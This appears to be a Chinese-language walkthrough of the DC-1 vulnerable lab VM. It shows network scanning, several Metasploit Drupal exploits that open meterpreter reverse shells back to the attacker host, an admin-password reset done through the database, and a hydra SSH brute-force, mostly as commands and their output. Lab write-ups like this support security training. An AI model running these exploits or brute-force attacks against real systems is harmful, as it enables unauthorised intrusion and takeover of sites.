root at kali in ~ $ arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:22:78:42, IPv4: 10.10.8.15 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 10.10.8.1 00:50:56:c0:00:08 VMware, Inc. 10.10.8.2 00:50:56:f2:17:ce VMware, Inc. 10.10.8.19 00:0c:29:2b:59:d5 VMware, Inc. 10.10.8.254 00:50:56:ea:af:43 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.979 seconds (129.36 hosts/sec). 4 responded
netdiscover
1 2 3 4 5 6 7 8 9 10 11 12
root at kali in ~ $ netdiscover -r 10.10.8.0/24
Currently scanning: Finished! | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.10.8.1 00:50:56:c0:00:08 1 60 VMware, Inc. 10.10.8.2 00:50:56:f2:17:ce 1 60 VMware, Inc. 10.10.8.19 00:0c:29:2b:59:d5 1 60 VMware, Inc. 10.10.8.254 00:50:56:ea:af:43 1 60 VMware, Inc.
for ip in {1..254} do ping -c 1 -W 1 10.10.8.$ip &>/dev/null if [ $? -eq 0 ] then echo "10.10.8.$ip is up" else echo "10.10.8.$ip is down" fi done
root at kali in /tmp $ chmod +x ping.sh
root at kali in /tmp $ ./ping.sh 10.10.8.1 is up 10.10.8.2 is up 10.10.8.3 is down ...... 10.10.8.14 is down 10.10.8.15 is up 10.10.8.16 is down 10.10.8.17 is down 10.10.8.18 is down 10.10.8.19 is up 10.10.8.20 is down ......
nmap
使用 Nmap 扫描出一个 IP:10.10.8.19
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
root at kali in ~ $ nmap -sn -T4 --min-rate 10000 10.10.8.0/24 Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 23:17 CST Nmap scan report for 10.10.8.1 Host is up (0.000089s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 10.10.8.2 Host is up (0.000047s latency). MAC Address: 00:50:56:F2:17:CE (VMware) Nmap scan report for 10.10.8.19 Host is up (0.000058s latency). MAC Address: 00:0C:29:2B:59:D5 (VMware) Nmap scan report for 10.10.8.254 Host is up (0.000037s latency). MAC Address: 00:50:56:EA:AF:43 (VMware) Nmap scan report for 10.10.8.15 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 5.21 seconds
端口扫描
扫描开放端口:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
root at kali in ~ $ nmap -p- -sT -T4 --min-rate 10000 10.10.8.19 Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 23:18 CST Nmap scan report for 10.10.8.19 Host is up (0.00044s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 38960/tcp open unknown MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.53 seconds
root at kali in ~ $ nmap -p22,80,111,38960 -sV -O -sT -T4 --min-rate 10000 10.10.8.19 Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 23:19 CST Nmap scan report for 10.10.8.19 Host is up (0.00028s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 38960/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:2B:59:D5 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds
root at kali in /tmp $ nikto -url http://10.10.8.19 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.10.8.19 + Target Hostname: 10.10.8.19 + Target Port: 80 + Start Time: 2023-11-08 00:04:29 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Debian) + /: Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: Drupal 7 was identified via the x-generator header. See: https://www.drupal.org/project/remove_http_headers + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Thu Nov 21 04:45:59 2013. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 ...... + /robots.txt: contains 36 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /misc/favicon.ico: identifies this app/server as: Drupal 7.x. See: https://en.wikipedia.org/wiki/Favicon + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 + /web.config: ASP config file is accessible. + /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that ...... + /user/: This might be interesting. + /README: Uncommon header 'tcn' found, with contents: choice. + /README: README file found. ...... + 9725 requests: 0 error(s) and 42 item(s) reported on remote host + End Time: 2023-11-08 00:10:10 (GMT8) (341 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
[warning] Caching heavily affects reliability of this exploit. Nodes are used as they are discovered, but once they are done, you will have to wait for cache expiry.
Targeting http://10.10.8.19/... [+] Finding a usable node id... [+] Using node_id 1 [!] Target does not appear to be vulnerable. [!] It may also simply be a caching issue, so maybe just try again later.
if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { echo"Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"; } else { echo"Error! Either the website isn't vulnerable, or your Internet isn't working. "; } ?>
if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { echo"Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"; } else { echo"Error! Either the website isn't vulnerable, or your Internet isn't working. "; } ?>
运行看看结果:
1 2 3
root at kali in ~/Desktop $ php 34993.php Success! Log in with username "admin" and password "admin" at http://10.10.8.19user/login
Provided by: Nicky Bloor <nick@nickbloor.co.uk> Mehmet Ince <mehmet@mehmetince.net>
Available targets: Id Name -- ---- => 0 Automatic
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The target URI of the Drupal installation VHOST no HTTP server virtual host
Description: This module exploits a Remote Command Execution vulnerability in the Drupal CODER Module. Unauthenticated users can execute arbitrary commands under the context of the web server user.
The CODER module doesn't sufficiently validate user inputs in a script file that has the PHP extension. A malicious unauthenticated user can make requests directly to this file to execute arbitrary commands. The module does not need to be enabled for this to be exploited.
This module was tested against CODER 2.5 with Drupal 7.5 installed on Ubuntu Server.
References: https://www.drupal.org/node/2765575
View the full module info with the info -d command.
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload information: Avoid: 3 characters
Description: This module exploits a Drupal property injection in the Forms API.
Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.8.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic (PHP In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.8.19 RHOSTS => 10.10.8.19 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 10.10.8.15:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Sending stage (39927 bytes) to 10.10.8.19 [*] Meterpreter session 2 opened (10.10.8.15:4444 -> 10.10.8.19:50211) at 2023-11-08 00:19:40 +0800
Provided by: SektionEins WhiteWinterWolf Christian Mehlmauer <FireFart@gmail.com> Brandon Perry
Module stability: crash-safe
Available targets: Id Name -- ---- => 0 Drupal 7.0 - 7.31 (form-cache PHP injection method) 1 Drupal 7.0 - 7.31 (user-post PHP injection method)
Check supported: No
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The target URI of the Drupal installation VHOST no HTTP server virtual host
Payload information:
Description: This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).
Two methods are available to trigger the PHP payload on the target:
- set TARGET 0: Form-cache PHP injection method (default). This uses the SQLi to upload a malicious form to Drupal's cache, then trigger the cache entry to execute the payload using a POP chain.
- set TARGET 1: User-post injection method. This creates a new Drupal user, adds it to the administrators group, enable Drupal's PHP module, grant the administrators the right to bundle PHP code in their post, create a new post containing the payload and preview it to trigger the payload execution.
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The target URI of the Drupal installation VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.8.15 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Drupal 7.0 - 7.31 (form-cache PHP injection method)
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/drupal_drupageddon) > set RHOSTS 10.10.8.19 RHOSTS => 10.10.8.19 msf6 exploit(multi/http/drupal_drupageddon) > run
[*] Started reverse TCP handler on 10.10.8.15:4444 [*] Sending stage (39927 bytes) to 10.10.8.19 [*] Meterpreter session 1 opened (10.10.8.15:4444 -> 10.10.8.19:50209) at 2023-11-07 23:52:09 +0800
Provided by: Reginaldo Silva juan vazquez <juan.vazquez@metasploit.com>
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH /etc/passwd yes The filepath to read on the server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen o n all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI /drupal yes Base Drupal directory path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host
Description: This module abuses an XML External Entity Injection vulnerability on the OpenID module from Drupal. The vulnerability exists in the parsing of a malformed XRDS file coming from a malicious OpenID endpoint. This module has been tested successfully on Drupal 7.15 and 7.2 with the OpenID module enabled.
Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH /etc/passwd yes The filepath to read on the server Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI /drupal yes Base Drupal directory path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/drupal_openid_xxe) > set RHOSTS 10.10.8.19 RHOSTS => 10.10.8.19 msf6 auxiliary(gather/drupal_openid_xxe) > run [*] Running module against 10.10.8.19
[*] Using URL: http://10.10.8.15:8080/y7tCtsuD [*] Server started. [!] Unexpected answer, trying to parse anyway... [*] Searching loot on the Drupal answer... [*] Searching loot on HTTP query... [*] Server stopped. [*] Auxiliary module execution completed
Provided by: Devin Zuczek Mehmet Ince <mehmet@mehmetince.net>
Available targets: Id Name -- ---- => 0 Automatic
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The target URI of the Drupal installation VHOST no HTTP server virtual host
Payload information:
Description: This module exploits a Remote PHP Code Execution vulnerability in the Drupal RESTWS Module. Unauthenticated users can execute arbitrary code under the context of the web server user.
RESTWS alters the default page callbacks for entities to provide additional functionality. A vulnerability in this approach allows an unauthenticated attacker to send specially crafted requests resulting in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 are affected by this issue.
This module was tested against RESTWS 2.5 with Drupal 7.5 installed on Ubuntu Server.
References: https://www.drupal.org/node/2765567
View the full module info with the info -d command.
Name: Drupal RESTful Web Services unserialize() RCE Module: exploit/unix/webapp/drupal_restws_unserialize Platform: PHP, Unix Arch: php, cmd Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2019-02-20
Provided by: Jasper Mattsson Charles Fol Rotem Reiss wvu <wvu@metasploit.com>
Module side effects: ioc-in-logs
Module stability: crash-safe
Module reliability: unreliable-session
Available targets: Id Name -- ---- => 0 PHP In-Memory 1 Unix In-Memory
Check supported: Yes
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output METHOD POST yes HTTP method to use (Accepted: GET, POST, PATCH, PUT) NODE 1 no Node ID to target with GET method Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload information: Avoid: 1 characters
Description: This module exploits a PHP unserialize() vulnerability in Drupal RESTful Web Services by sending a crafted request to the /node REST endpoint.
As per SA-CORE-2019-003, the initial remediation was to disable POST, PATCH, and PUT, but Ambionics discovered that GET was also vulnerable (albeit cached). Cached nodes can be exploited only once.
Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of this alternate vector.
Every good CMS needs a config file - and so do you.
看样子是提示我们要找配置文件,google 一下:
找到了对应路径,访问一下:
flag2
找到了账号和密码,同时也出现了 flag2:
1 2 3 4 5 6 7 8 9 10 11
/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ 'username' => 'dbuser', 'password' => 'R0ck3t',
尝试 SSH 登录一下:
1 2
ssh dbuser@10.10.8.19 ssh root@10.10.8.19
结果都登不上。
本地 MySQL 连接
既然都登不上,获取到的又是 MySQL 的账号密码,在本地连接:
1 2 3 4 5 6 7 8 9 10 11 12 13
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t mysql -udbuser -pR0ck3t Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 44 Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | drupaldb | +--------------------+ 2 rows in set (0.00 sec) mysql> use drupaldb; use drupaldb; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
(www-data:/var/www) $ cd scripts (www-data:/var/www/scripts) $ ./password-hash.sh 123 PHP Warning: include_once(/var/www/scripts/includes/password.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 83 PHP Warning: include_once(): Failed opening '/var/www/scripts/includes/password.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 83 PHP Warning: include_once(/var/www/scripts/includes/bootstrap.inc): failed to open stream: No such file or directory in (www-data:/var/www/scripts) $ cd .. (www-data:/var/www) $ ./scripts/password-hash.sh 123 password: 123 hash: $S$DKZ9OkGR2kNOP34qm6lPHY.CVszApA5yWktmmZR5fi.ZnVgjHoLo
将生成的密码,进行更新:
1
UPDATE users SET pass = '$S$DKZ9OkGR2kNOP34qm6lPHY.CVszApA5yWktmmZR5fi.ZnVgjHoLo' WHERE name = 'admin'
flag3
尝试登录一下:
在 Dashboard 处发现了第三个 flag:
1
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
www-data@DC-1:/var/www$ cd /home/flag4 cd /home/flag4 www-data@DC-1:/home/flag4$ ls ls flag4.txt www-data@DC-1:/home/flag4$ cat flag4.txt cat flag4.txt Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
root at kali in ~ $ hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://10.10.8.19 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-09 20:17:10 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.8.19:22/ [22][ssh] host: 10.10.8.19 login: flag4 password: orange 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-09 20:18:12
得到密码 orange,登录一下:
1 2 3 4 5 6 7 8 9 10 11 12 13
root at kali in ~ $ ssh flag4@10.10.8.19 flag4@10.10.8.19's password: Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. flag4@DC-1:~$ id uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
